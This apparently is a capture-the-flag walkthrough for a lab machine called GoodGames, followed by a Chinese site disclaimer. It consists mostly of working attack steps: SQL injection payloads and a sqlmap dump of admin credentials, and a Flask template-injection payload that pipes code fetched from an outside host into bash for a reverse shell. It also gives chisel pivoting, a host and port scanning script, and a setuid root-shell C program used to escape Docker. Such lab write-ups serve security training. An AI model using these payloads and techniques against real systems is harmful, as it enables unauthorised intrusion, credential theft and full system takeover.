Information Gathering

$ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.51
|_http-server-header: Werkzeug/2.0.2 Python/3.9.2
|_http-title: GoodGames | Community and Store
Service Info: Host: goodgames.htb

SQLI

# echo '10.10.11.130 goodgames.htb' >> /etc/hosts

$ dirsearch -u 'http://goodgames.htb'

$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac

email=1%40gmail.com'--+&password=123

email=1%40gmail.com'%20OR%20'1'='1'--+&password=123

$ sqlmap -r sqli -p email --batch

$ sqlmap -r sqli -p email --batch -D main -T user --dump

email:[email protected]
username:admin
password:superadministrator

# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts

Flask SSTI Injection

http://internal-administration.goodgames.htb/login

POST /settings HTTP/1.1
Host: internal-administration.goodgames.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Origin: http://internal-administration.goodgames.htb
Connection: close
Referer: http://internal-administration.goodgames.htb/settings
Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
Upgrade-Insecure-Requests: 1


name={{9*9}}

name={{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}

User.txt

388118f20c90df4d38744d9ac624dd43

Privilege Escalation : Docker Escape

Server:

$ chisel server -p 8000 --reverse

Client:

# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks

Server:

$ vim 10.10.11.130.conf

Client:

# arp -a

https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh

#!/bin/bash

RED="\e[31m"
GREEN="\e[32m"
YELLOW="\e[33m"
ENDCOLOR="\e[0m"

hostname=$(hostname)

echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"


echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
ifconfig | awk '{print $(NF - -4), $NF}' | grep "172."  | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"

echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"

which aws
which netcat
which nc.traditional
which curl
which ping
which gcc
which g++
which make
which gdb
which base64
which socat
which python
which python2
which python3
which perl
which php
which ruby
which xterm
which sudo
which wget
which nc 
which nmap
which fping

echo -e "\n"

echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"

if [ -z $1 ]
then
    echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
    exit 1
fi

if [[ $# =~ 1 ]]
then
   hosts=($1)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
fi

if [[ $# =~ 2 ]]
then
   hosts=($1 $2)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
fi

if [[ $# =~ 3 ]]
then
   hosts=($1 $2 $3)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
fi

if [[ $# =~ 4 ]]
then
   hosts=($1 $2 $3 $4)
   echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
fi


for host in ${hosts[@]}; do
	echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
	for i in $(seq 1 254); do
		timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
		a=$(echo $?)
		if [[ $a =~ 0 ]]
		then
			array[${#array[@]}]=$host.$i
			echo $host.$i >> hosts.txt
			b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
			if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
                	then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Linux]"
			
			elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
			then
				echo "[+] HOST $host.$i  ACTIVE  [OS=Windows]"
			else
				echo "[+] HOST $host.$i  ACTIVE  [OS=UNDETECTED]"
			fi
		fi
        done; wait
done

for host in ${array[@]}; do
        echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
        for port in $(seq 1 10001); do
                timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
        done; wait
done

# ./host_discovery.sh 172.19.0

Server:

$ sudo proxychains -f 10.10.11.130.conf ssh [email protected]

Docker用户创建test文件在augustus目录中test所有者是root

#include <stdio.h>
#include <stdlib.h>

int main() {
        setuid(0);
        system("/bin/bash");
}

# wget http://10.10.16.16/suid.c

# gcc suid.c -o suid

# chmod u+s suid

augustus@GoodGames:~$ ./suid

Root.txt

a42c76fe28f8a2556fa7e8794f133c15

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）